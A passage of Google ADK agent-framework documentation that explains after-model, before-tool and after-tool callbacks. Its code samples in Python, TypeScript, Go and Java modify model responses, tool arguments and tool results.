Modifying response.`); // Create a deep copy to avoid mutating the original response object const modifiedResponse = JSON.parse(JSON.stringify(response)); // Safely modify the text of the first part if (modifiedResponse.content?.parts?.[0]) { // Use a regular expression for case-insensitive replacement const regex = new RegExp(searchTerm, "gi"); modifiedResponse.content.parts[0].text = modelResponseText.replace(regex, replaceTerm); } console.log(`[Callback] Returning modified response.`); return modifiedResponse; } console.log("[Callback] Proceeding with original LLM response."); // Return undefined to proceed without any modifications return undefined; } // --- Create LlmAgent and Assign Callback --- const myLlmAgent = new LlmAgent({ name: "AfterModelCallbackAgent", model: MODEL_NAME, instruction: "You are a helpful assistant who tells jokes.", description: "An LLM agent demonstrating after_model_callback", afterModelCallback: simpleAfterModelModifier, // Assign the function here }); // --- Agent Interaction Logic --- async function callAgentAndPrint({runner, query, sessionId,}: { runner: InMemoryRunner; query: string; sessionId: string;}) { console.log(`\n>>> Calling Agent with query: "${query}"`); let finalResponseContent = "No final response received."; const events = runner.runAsync({ userId: USER_ID, sessionId: sessionId, newMessage: createUserContent(query), }); for await (const event of events) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts .map((part: { text?: string }) => part.text ?? 
"") .join(""); } } console.log("<<< Agent Response: ", finalResponseContent); } // --- Run Interactions --- async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: The callback will find "joke" and modify the response await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_JOKE, }); await callAgentAndPrint({ runner: runner, query: 'write a short joke about computers', sessionId: SESSION_ID_JOKE, }); // Scenario 2: The callback will not find "joke" and will pass the response through unmodified await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_POEM, }); await callAgentAndPrint({ runner: runner, query: 'write a short poem about coding', sessionId: SESSION_ID_POEM, }); } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) func onAfterModel(ctx agent.CallbackContext, resp *model.LLMResponse, respErr error) (*model.LLMResponse, error) { log.Printf("[Callback] AfterModel triggered for agent %q.", ctx.AgentName()) if respErr != nil { log.Printf("[Callback] Model returned an error: %v. Passing it through.", respErr) return nil, respErr } if resp == nil || resp.Content == nil || len(resp.Content.Parts) == 0 { log.Println("[Callback] Response is nil or has no parts, nothing to process.") return nil, nil } // Check for function calls and pass them through without modification. if resp.Content.Parts[0].FunctionCall != nil { log.Println("[Callback] Response is a function call. 
No modification.") return nil, nil } originalText := resp.Content.Parts[0].Text // Use a case-insensitive regex with word boundaries to find "joke". re := regexp.MustCompile(`(?i)\bjoke\b`) if !re.MatchString(originalText) { log.Println("[Callback] 'joke' not found. Passing original response through.") return nil, nil } log.Println("[Callback] 'joke' found. Modifying response.") // Use a replacer function to handle capitalization. modifiedText := re.ReplaceAllStringFunc(originalText, func(s string) string { if strings.ToUpper(s) == "JOKE" { if s == "Joke" { return "Funny story" } return "funny story" } return s // Should not be reached with this regex, but it's safe. }) resp.Content.Parts[0].Text = modifiedText return resp, nil } func runAfterModelExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithAfterModelCallback", Model: geminiModel, AfterModelCallbacks: []llmagent.AfterModelCallback{onAfterModel}, } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Response should be modified ---") runScenario(ctx, r, sessionService, appName, "session_modify", nil, `Give me a paragraph about different styles of jokes.`) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.models.LlmResponse; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; 
import io.reactivex.rxjava3.core.Flowable;
import io.reactivex.rxjava3.core.Maybe;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class AfterModelCallbackExample {

  // --- Define Constants ---
  private static final String AGENT_NAME = "AfterModelCallbackAgent";
  private static final String MODEL_NAME = "gemini-2.0-flash";
  private static final String AGENT_INSTRUCTION = "You are a helpful assistant.";
  private static final String AGENT_DESCRIPTION = "An LLM agent demonstrating after_model_callback";

  // For session and runner
  private static final String APP_NAME = "AfterModelCallbackAgentApp";
  private static final String USER_ID = "user_1";

  // For text replacement
  private static final String SEARCH_TERM = "joke";
  private static final String REPLACE_TERM = "funny story";
  private static final Pattern SEARCH_PATTERN =
      Pattern.compile("\\b" + Pattern.quote(SEARCH_TERM) + "\\b", Pattern.CASE_INSENSITIVE);

  public static void main(String[] args) {
    AfterModelCallbackExample example = new AfterModelCallbackExample();
    example.defineAgentAndRun();
  }

  // --- Define the Callback Function ---
  // Inspects/modifies the LLM response after it's received.
  public Maybe<LlmResponse> simpleAfterModelModifier(
      CallbackContext callbackContext, LlmResponse llmResponse) {
    String agentName = callbackContext.agentName();
    System.out.printf("%n[Callback] After model call for agent: %s%n", agentName);

    // --- Inspection Phase ---
    if (llmResponse.errorMessage().isPresent()) {
      System.out.printf(
          "[Callback] Response has error: '%s'. No modification.%n",
          llmResponse.errorMessage().get());
      return Maybe.empty(); // Pass through errors
    }

    Optional<Part> firstTextPartOpt =
        llmResponse
            .content()
            .flatMap(Content::parts)
            .filter(parts -> !parts.isEmpty() && parts.get(0).text().isPresent())
            .map(parts -> parts.get(0));

    if (!firstTextPartOpt.isPresent()) {
      // Could be a function call, empty content, or no text in the first part
      llmResponse
          .content()
          .flatMap(Content::parts)
          .filter(parts -> !parts.isEmpty() && parts.get(0).functionCall().isPresent())
          .ifPresent(
              parts ->
                  System.out.printf(
                      "[Callback] Response is a function call ('%s'). No text modification.%n",
                      parts.get(0).functionCall().get().name().orElse("N/A")));
      if (!llmResponse.content().isPresent()
          || !llmResponse.content().flatMap(Content::parts).isPresent()
          || llmResponse.content().flatMap(Content::parts).get().isEmpty()) {
        System.out.println(
            "[Callback] Response content is empty or has no parts. No modification.");
      } else if (!firstTextPartOpt.isPresent()) { // Already checked for function call
        System.out.println("[Callback] First part has no text content. No modification.");
      }
      return Maybe.empty(); // Pass through non-text or unsuitable responses
    }

    String originalText = firstTextPartOpt.get().text().get();
    System.out.printf("[Callback] Inspected original text: '%.100s...'%n", originalText);

    // --- Modification Phase ---
    Matcher matcher = SEARCH_PATTERN.matcher(originalText);
    if (!matcher.find()) {
      System.out.printf(
          "[Callback] '%s' not found. Passing original response through.%n", SEARCH_TERM);
      return Maybe.empty();
    }

    System.out.printf("[Callback] Found '%s'. Modifying response.%n", SEARCH_TERM);

    // Perform the replacement, respecting original capitalization of the found term's first letter
    String foundTerm = matcher.group(0); // The actual term found (e.g., "joke" or "Joke")
    String actualReplaceTerm = REPLACE_TERM;
    if (Character.isUpperCase(foundTerm.charAt(0)) && REPLACE_TERM.length() > 0) {
      actualReplaceTerm = Character.toUpperCase(REPLACE_TERM.charAt(0)) + REPLACE_TERM.substring(1);
    }
    String modifiedText = matcher.replaceFirst(Matcher.quoteReplacement(actualReplaceTerm));

    // Create a new LlmResponse with the modified content
    Content originalContent = llmResponse.content().get();
    List<Part> originalParts = originalContent.parts().orElse(ImmutableList.of());

    List<Part> modifiedPartsList = new ArrayList<>(originalParts.size());
    if (!originalParts.isEmpty()) {
      modifiedPartsList.add(Part.fromText(modifiedText)); // Replace first part's text
      // Add remaining parts as they were (shallow copy)
      for (int i = 1; i < originalParts.size(); i++) {
        modifiedPartsList.add(originalParts.get(i));
      }
    } else { // Should not happen if firstTextPartOpt was present
      modifiedPartsList.add(Part.fromText(modifiedText));
    }

    LlmResponse.Builder newResponseBuilder =
        LlmResponse.builder()
            .content(
                originalContent.toBuilder().parts(ImmutableList.copyOf(modifiedPartsList)).build())
            .groundingMetadata(llmResponse.groundingMetadata());

    System.out.println("[Callback] Returning modified response.");
    return Maybe.just(newResponseBuilder.build());
  }

  // --- 2. Define Agent and Run Scenarios ---
  public void defineAgentAndRun() {
    // Setup Agent with Callback
    LlmAgent myLlmAgent =
        LlmAgent.builder()
            .name(AGENT_NAME)
            .model(MODEL_NAME)
            .instruction(AGENT_INSTRUCTION)
            .description(AGENT_DESCRIPTION)
            .afterModelCallback(this::simpleAfterModelModifier)
            .build();

    // Create an InMemoryRunner
    InMemoryRunner runner = new InMemoryRunner(myLlmAgent, APP_NAME);
    // InMemoryRunner automatically creates a session service.
    // Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage =
        Content.fromParts(
            Part.fromText(
                "Tell me a joke about quantum computing. Include the word 'joke' in your response"));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
```

## Tool Execution Callbacks

These callbacks are also specific to `LlmAgent` and trigger around the execution of tools (including `FunctionTool`, `AgentTool`, etc.) that the LLM might request.

### Before Tool Callback

**When:** Called just before a specific tool's `run_async` method is invoked, after the LLM has generated a function call for it.

**Purpose:** Lets you inspect and modify tool arguments, perform authorization checks before execution, log tool usage attempts, or implement tool-level caching.

**Return Value Effect:**

1. If the callback returns `None` (or a `Maybe.empty()` object in Java), the tool's `run_async` method is executed with the (potentially modified) `args`.
1. If a dictionary (or `Map` in Java) is returned, the tool's `run_async` method is **skipped**. The returned dictionary is used directly as the result of the tool call. This is useful for caching or overriding tool behavior.

```python
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from google.adk.agents import LlmAgent
from google.adk.runners import Runner
from typing import Optional
from google.genai import types
from google.adk.sessions import InMemorySessionService
from google.adk.tools import FunctionTool
from google.adk.tools.tool_context import ToolContext
from google.adk.tools.base_tool import BaseTool
from typing import Dict, Any

GEMINI_2_FLASH = "gemini-2.0-flash"


def get_capital_city(country: str) -> str:
    """Retrieves the capital city of a given country."""
    print(f"--- Tool 'get_capital_city' executing with country: {country} ---")
    country_capitals = {
        "united states": "Washington, D.C.",
        "canada": "Ottawa",
        "france": "Paris",
        "germany": "Berlin",
    }
    return country_capitals.get(country.lower(), f"Capital not found for {country}")


capital_tool = FunctionTool(func=get_capital_city)


def simple_before_tool_modifier(
    tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext
) -> Optional[Dict]:
    """Inspects/modifies tool args or skips the tool call."""
    agent_name = tool_context.agent_name
    tool_name = tool.name
    print(f"[Callback] Before tool call for tool '{tool_name}' in agent '{agent_name}'")
    print(f"[Callback] Original args: {args}")

    if tool_name == 'get_capital_city' and args.get('country', '').lower() == 'canada':
        print("[Callback] Detected 'Canada'. Modifying args to 'France'.")
        args['country'] = 'France'
        print(f"[Callback] Modified args: {args}")
        return None

    # If the tool is 'get_capital_city' and country is 'BLOCK'
    if tool_name == 'get_capital_city' and args.get('country', '').upper() == 'BLOCK':
        print("[Callback] Detected 'BLOCK'. Skipping tool execution.")
        return {"result": "Tool execution was blocked by before_tool_callback."}

    print("[Callback] Proceeding with original or previously modified args.")
    return None


my_llm_agent = LlmAgent(
    name="ToolCallbackAgent",
    model=GEMINI_2_FLASH,
    instruction="You are an agent that can find capital cities. Use the get_capital_city tool.",
    description="An LLM agent demonstrating before_tool_callback",
    tools=[capital_tool],
    before_tool_callback=simple_before_tool_modifier,
)

APP_NAME = "guardrail_app"
USER_ID = "user_1"
SESSION_ID = "session_001"


# Session and Runner
async def setup_session_and_runner():
    session_service = InMemorySessionService()
    session = await session_service.create_session(
        app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
    )
    runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service)
    return session, runner


# Agent Interaction
async def call_agent_async(query):
    content = types.Content(role='user', parts=[types.Part(text=query)])
    session, runner = await setup_session_and_runner()
    events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    async for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("Agent Response: ", final_response)


# Note: In Colab, you can directly use 'await' at the top level.
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop.
await call_agent_async("Canada")
```

```typescript
/**
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

import {
  LlmAgent,
  InMemoryRunner,
  FunctionTool,
  ToolContext,
  isFinalResponse,
  BaseTool,
} from '@google/adk';
import { createUserContent } from "@google/genai";
import { z } from 'zod';

const MODEL_NAME = "gemini-2.5-flash";
const APP_NAME = "before_tool_callback_app";
const USER_ID = "test_user_before_tool";

// --- Define a Simple Tool Function ---
const CountryInput = z.object({
  country: z.string().describe('The country to get the capital for.'),
});

async function getCapitalCity(params: z.infer<typeof CountryInput>): Promise<{ result: string }> {
  console.log(`\n-- Tool Call: getCapitalCity(country='${params.country}') --`);
  const capitals: Record<string, string> = {
    'united states': 'Washington, D.C.',
    'canada': 'Ottawa',
    'france': 'Paris',
    'japan': 'Tokyo',
  };
  const result =
    capitals[params.country.toLowerCase()] ??
    `Sorry, I couldn't find the capital for ${params.country}.`;
  console.log(`-- Tool Result: '${result}' --`);
  return { result };
}

const getCapitalCityTool = new FunctionTool({
  name: 'get_capital_city',
  description: 'Retrieves the capital city for a given country',
  parameters: CountryInput,
  execute: getCapitalCity,
});

// --- Define the Callback Function ---
function simpleBeforeToolModifier({
  tool,
  args,
  context,
}: {
  tool: BaseTool;
  args: Record<string, any>;
  context: ToolContext;
}) {
  const agentName = context.agentName;
  const toolName = tool.name;
  console.log(`[Callback] Before tool call for tool '${toolName}' in agent '${agentName}'`);
  console.log(`[Callback] Original args: ${JSON.stringify(args)}`);

  if (
    toolName === "get_capital_city" &&
    args["country"]?.toLowerCase() === "canada"
  ) {
    console.log("[Callback] Detected 'Canada'. Modifying args to 'France'.");
    args["country"] = "France";
    console.log(`[Callback] Modified args: ${JSON.stringify(args)}`);
    return undefined;
  }

  if (
    toolName === "get_capital_city" &&
    args["country"]?.toUpperCase() === "BLOCK"
  ) {
    console.log("[Callback] Detected 'BLOCK'. Skipping tool execution.");
    return { result: "Tool execution was blocked by before_tool_callback." };
  }

  console.log("[Callback] Proceeding with original or previously modified args.");
  return;
}

// Create LlmAgent and Assign Callback
const myLlmAgent = new LlmAgent({
  name: 'ToolCallbackAgent',
  model: MODEL_NAME,
  instruction: 'You are an agent that can find capital cities. Use the get_capital_city tool.',
  description: 'An LLM agent demonstrating before_tool_callback',
  tools: [getCapitalCityTool],
  beforeToolCallback: simpleBeforeToolModifier,
});

// Agent Interaction Logic
async function callAgentAndPrint(runner: InMemoryRunner, query: string, sessionId: string) {
  console.log(`\n>>> Calling Agent for session '${sessionId}' | Query: "${query}"`);

  for await (const event of runner.runAsync({
    userId: USER_ID,
    sessionId,
    newMessage: createUserContent(query),
  })) {
    if (isFinalResponse(event) && event.content?.parts?.length) {
      const finalResponseContent = event.content.parts.map(part => part.text ?? '').join('');
      console.log(`<<< Final Output: ${finalResponseContent}`);
    }
  }
}

// Run Interactions
async function main() {
  const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME });

  // Scenario 1: Callback modifies the arguments from "Canada" to "France"
  const canadaSessionId = 'session_canada_test';
  await runner.sessionService.createSession({
    appName: APP_NAME,
    userId: USER_ID,
    sessionId: canadaSessionId,
  });
  await callAgentAndPrint(runner, 'What is the capital of Canada?', canadaSessionId);

  // Scenario 2: Callback skips the tool call
  const blockSessionId = 'session_block_test';
  await runner.sessionService.createSession({
    appName: APP_NAME,
    userId: USER_ID,
    sessionId: blockSessionId,
  });
  await callAgentAndPrint(runner, 'What is the capital of BLOCK?', blockSessionId);
}

main();
```

```go
package main

import (
	"context"
	"fmt"
	"log"
	"regexp"
	"strings"

	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/model"
	"google.golang.org/adk/model/gemini"
	"google.golang.org/adk/runner"
	"google.golang.org/adk/session"
	"google.golang.org/adk/tool"
	"google.golang.org/adk/tool/functiontool"
	"google.golang.org/genai"
)

// GetCapitalCityArgs defines the arguments for the getCapitalCity tool.
type GetCapitalCityArgs struct {
	Country string `json:"country" jsonschema:"The country to get the capital of."`
}

// getCapitalCity is a tool that returns the capital of a given country.
func getCapitalCity(ctx tool.Context, args *GetCapitalCityArgs) (string, error) {
	capitals := map[string]string{
		"canada":        "Ottawa",
		"france":        "Paris",
		"germany":       "Berlin",
		"united states": "Washington, D.C.",
	}
	capital, ok := capitals[strings.ToLower(args.Country)]
	if !ok {
		return "", fmt.Errorf("unknown country: %s", args.Country)
	}
	return capital, nil
}

func onBeforeTool(ctx tool.Context, t tool.Tool, args map[string]any) (map[string]any, error) {
	log.Printf("[Callback] BeforeTool triggered for tool %q in agent %q.", t.Name(), ctx.AgentName())
	log.Printf("[Callback] Original args: %v", args)

	if t.Name() == "getCapitalCity" {
		if country, ok := args["country"].(string); ok {
			if strings.ToLower(country) == "canada" {
				log.Println("[Callback] Detected 'Canada'. Modifying args to 'France'.")
				args["country"] = "France"
				return args, nil // Proceed with modified args
			} else if strings.ToUpper(country) == "BLOCK" {
				log.Println("[Callback] Detected 'BLOCK'. Skipping tool execution.")
				// Skip tool and return a custom result.
				return map[string]any{"result": "Tool execution was blocked by before_tool_callback."}, nil
			}
		}
	}
	log.Println("[Callback] Proceeding with original or previously modified args.")
	return nil, nil // Proceed with original args
}

// Note: modelName, appName, and runScenario are not defined in this snippet;
// they come from elsewhere in the example file.
func runBeforeToolExample() {
	ctx := context.Background()
	geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{})
	if err != nil {
		log.Fatalf("FATAL: Failed to create model: %v", err)
	}
	capitalTool, err := functiontool.New(functiontool.Config{
		Name:        "getCapitalCity",
		Description: "Retrieves the capital city of a given country.",
	}, getCapitalCity)
	if err != nil {
		log.Fatalf("FATAL: Failed to create function tool: %v", err)
	}

	llmCfg := llmagent.Config{
		Name:                "AgentWithBeforeToolCallback",
		Model:               geminiModel,
		Tools:               []tool.Tool{capitalTool},
		BeforeToolCallbacks: []llmagent.BeforeToolCallback{onBeforeTool},
		Instruction:         "You are an agent that can find capital cities. Use the getCapitalCity tool.",
	}
	testAgent, err := llmagent.New(llmCfg)
	if err != nil {
		log.Fatalf("FATAL: Failed to create agent: %v", err)
	}

	sessionService := session.InMemoryService()
	r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService})
	if err != nil {
		log.Fatalf("FATAL: Failed to create runner: %v", err)
	}

	log.Println("--- SCENARIO 1: Args should be modified ---")
	runScenario(ctx, r, sessionService, appName, "session_tool_modify", nil, "What is the capital of Canada?")

	log.Println("--- SCENARIO 2: Tool call should be blocked ---")
	runScenario(ctx, r, sessionService, appName, "session_tool_block", nil, "capital of BLOCK")
}
```

```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.InvocationContext;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.BaseTool;
import com.google.adk.tools.FunctionTool;
import com.google.adk.tools.ToolContext;
import com.google.common.collect.ImmutableMap;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import io.reactivex.rxjava3.core.Maybe;
import java.util.HashMap;
import java.util.Map;

public class BeforeToolCallbackExample {

  private static final String APP_NAME = "ToolCallbackAgentApp";
  private static final String USER_ID = "user_1";
  private static final String SESSION_ID = "session_001";
  private static final String MODEL_NAME = "gemini-2.0-flash";

  public static void main(String[] args) {
    BeforeToolCallbackExample example = new BeforeToolCallbackExample();
    example.runAgent("capital of canada");
  }

  // --- Define a Simple Tool Function ---
  // The Schema is important for the callback "args" to correctly identify the input.
  public static Map<String, Object> getCapitalCity(
      @Schema(name = "country", description = "The country to find the capital of.")
          String country) {
    System.out.printf("--- Tool 'getCapitalCity' executing with country: %s ---%n", country);
    Map<String, String> countryCapitals = new HashMap<>();
    countryCapitals.put("united states", "Washington, D.C.");
    countryCapitals.put("canada", "Ottawa");
    countryCapitals.put("france", "Paris");
    countryCapitals.put("germany", "Berlin");

    String capital =
        countryCapitals.getOrDefault(country.toLowerCase(), "Capital not found for " + country);
    // FunctionTool expects a Map as the return type for the method it wraps.
    return ImmutableMap.of("capital", capital);
  }

  // Define the Callback function
  // The Tool callback provides all these parameters by default.
  public Maybe<Map<String, Object>> simpleBeforeToolModifier(
      InvocationContext invocationContext,
      BaseTool tool,
      Map<String, Object> args,
      ToolContext toolContext) {

    String agentName = invocationContext.agent().name();
    String toolName = tool.name();
    System.out.printf(
        "[Callback] Before tool call for tool '%s' in agent '%s'%n", toolName, agentName);
    System.out.printf("[Callback] Original args: %s%n", args);

    if ("getCapitalCity".equals(toolName)) {
      String countryArg = (String) args.get("country");
      if (countryArg != null) {
        if ("canada".equalsIgnoreCase(countryArg)) {
          System.out.println("[Callback] Detected 'Canada'. Modifying args to 'France'.");
          args.put("country", "France");
          System.out.printf("[Callback] Modified args: %s%n", args);
          // Proceed with modified args
          return Maybe.empty();
        } else if ("BLOCK".equalsIgnoreCase(countryArg)) {
          System.out.println("[Callback] Detected 'BLOCK'. Skipping tool execution.");
          // Return a map to skip the tool call and use this as the result
          return Maybe.just(
              ImmutableMap.of("result", "Tool execution was blocked by before_tool_callback."));
        }
      }
    }

    System.out.println("[Callback] Proceeding with original or previously modified args.");
    return Maybe.empty();
  }

  public void runAgent(String query) {
    // --- Wrap the function into a Tool ---
    FunctionTool capitalTool = FunctionTool.create(this.getClass(), "getCapitalCity");

    // Create LlmAgent and Assign Callback
    LlmAgent myLlmAgent =
        LlmAgent.builder()
            .name(APP_NAME)
            .model(MODEL_NAME)
            .instruction(
                "You are an agent that can find capital cities. Use the getCapitalCity tool.")
            .description("An LLM agent demonstrating before_tool_callback")
            .tools(capitalTool)
            .beforeToolCallback(this::simpleBeforeToolModifier)
            .build();

    // Session and Runner
    InMemoryRunner runner = new InMemoryRunner(myLlmAgent);
    Session session =
        runner.sessionService().createSession(APP_NAME, USER_ID, null, SESSION_ID).blockingGet();

    Content userMessage = Content.fromParts(Part.fromText(query));

    System.out.printf("%n--- Calling agent with query: \"%s\" ---%n", query);
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);
    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
```

### After Tool Callback

**When:** Called just after the tool's `run_async` method completes successfully.

**Purpose:** Lets you inspect and modify the tool's result before it is sent back to the LLM (potentially after summarization). Useful for logging tool results, post-processing or formatting results, or saving specific parts of the result to the session state.

**Return Value Effect:**

1. If the callback returns `None` (or a `Maybe.empty()` object in Java), the original `tool_response` is used.
1. If a new dictionary is returned, it **replaces** the original `tool_response`.
   This allows modifying or filtering the result seen by the LLM.

```python
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from google.adk.agents import LlmAgent
from google.adk.runners import Runner
from typing import Optional
from google.genai import types
from google.adk.sessions import InMemorySessionService
from google.adk.tools import FunctionTool
from google.adk.tools.tool_context import ToolContext
from google.adk.tools.base_tool import BaseTool
from typing import Dict, Any
from copy import deepcopy

GEMINI_2_FLASH = "gemini-2.0-flash"


# --- Define a Simple Tool Function (Same as before) ---
def get_capital_city(country: str) -> Dict[str, str]:
    """Retrieves the capital city of a given country."""
    print(f"--- Tool 'get_capital_city' executing with country: {country} ---")
    country_capitals = {
        "united states": "Washington, D.C.",
        "canada": "Ottawa",
        "france": "Paris",
        "germany": "Berlin",
    }
    return {"result": country_capitals.get(country.lower(), f"Capital not found for {country}")}


# --- Wrap the function into a Tool ---
capital_tool = FunctionTool(func=get_capital_city)


# --- Define the Callback Function ---
def simple_after_tool_modifier(
    tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext, tool_response: Dict
) -> Optional[Dict]:
    """Inspects/modifies the tool result after execution."""
    agent_name = tool_context.agent_name
    tool_name = tool.name
    print(f"[Callback] After tool call for tool '{tool_name}' in agent '{agent_name}'")
    print(f"[Callback] Args used: {args}")
    print(f"[Callback] Original tool_response: {tool_response}")

    # Default structure for function tool results is {"result": <return_value>}
    original_result_value = tool_response.get("result", "")
    # original_result_value = tool_response

    # --- Modification Example ---
    # If the tool was 'get_capital_city' and result is 'Washington, D.C.'
    if tool_name == 'get_capital_city' and original_result_value == "Washington, D.C.":
        print("[Callback] Detected 'Washington, D.C.'. Modifying tool response.")

        # IMPORTANT: Create a new dictionary or modify a copy
        modified_response = deepcopy(tool_response)
        modified_response["result"] = f"{original_result_value} (Note: This is the capital of the USA)."
        modified_response["note_added_by_callback"] = True  # Add extra info if needed

        print(f"[Callback] Modified tool_response: {modified_response}")
        return modified_response  # Return the modified dictionary

    print("[Callback] Passing original tool response through.")
    # Return None to use the original tool_response
    return None


# Create LlmAgent and Assign Callback
my_llm_agent = LlmAgent(
    name="AfterToolCallbackAgent",
    model=GEMINI_2_FLASH,
    instruction="You are an agent that finds capital cities using the get_capital_city tool. Report the result clearly.",
    description="An LLM agent demonstrating after_tool_callback",
    tools=[capital_tool],  # Add the tool
    after_tool_callback=simple_after_tool_modifier,  # Assign the callback
)

APP_NAME = "guardrail_app"
USER_ID = "user_1"
SESSION_ID = "session_001"


# Session and Runner
async def setup_session_and_runner():
    session_service = InMemorySessionService()
    session = await session_service.create_session(
        app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
    )
    runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service)
    return session, runner


# Agent Interaction
async def call_agent_async(query):
    content = types.Content(role='user', parts=[types.Part(text=query)])
    session, runner = await setup_session_and_runner()
    events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    async for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("Agent Response: ", final_response)


# Note: In Colab, you can directly use 'await' at the top level.
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop.
await call_agent_async("united states")
```

```typescript
/**
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

import {
  LlmAgent,
  InMemoryRunner,
  FunctionTool,
  isFinalResponse,
  ToolContext,
  BaseTool,
} from "@google/adk";
import { createUserContent } from "@google/genai";
import { z } from "zod";

const MODEL_NAME = "gemini-2.5-flash";
const APP_NAME = "after_tool_callback_app";
const USER_ID = "test_user_after_tool";
const SESSION_ID = "session_001";

// --- Define a Simple Tool Function ---
const CountryInput = z.object({
  country: z.string().describe("The country to get the capital for."),
});

async function getCapitalCity(
  params: z.infer<typeof CountryInput>,
): Promise<{ result: string }> {
  console.log(`--- Tool 'get_capital_city' executing with country: ${params.country} ---`);
  const countryCapitals: Record<string, string> = {
    "united states": "Washington, D.C.",
    "canada": "Ottawa",
    "france": "Paris",
    "germany": "Berlin",
  };
  const result =
    countryCapitals[params.country.toLowerCase()] ??
    `Capital not found for ${params.country}`;
  return { result };
}

// --- Wrap the function into a Tool ---
const capitalTool = new FunctionTool({
  name: "get_capital_city",
  description: "Retrieves the capital city for a given country",
  parameters: CountryInput,
  execute: getCapitalCity,
});

// --- Define the Callback Function ---
function simpleAfterToolModifier({
  tool,
  args,
  context,
  response,
}: {
  tool: BaseTool;
  args: Record<string, any>;
  context: ToolContext;
  response: Record<string, any>;
}) {
  const agentName = context.agentName;
  const toolName = tool.name;
  console.log(`[Callback] After tool call for tool '${toolName}' in agent '${agentName}'`);
  // Serialize the args object so the log shows its contents rather than "[object Object]"
  console.log(`[Callback] Original args: ${JSON.stringify(args)}`);

  const originalResultValue = response?.result || "";

  // --- Modification Example ---
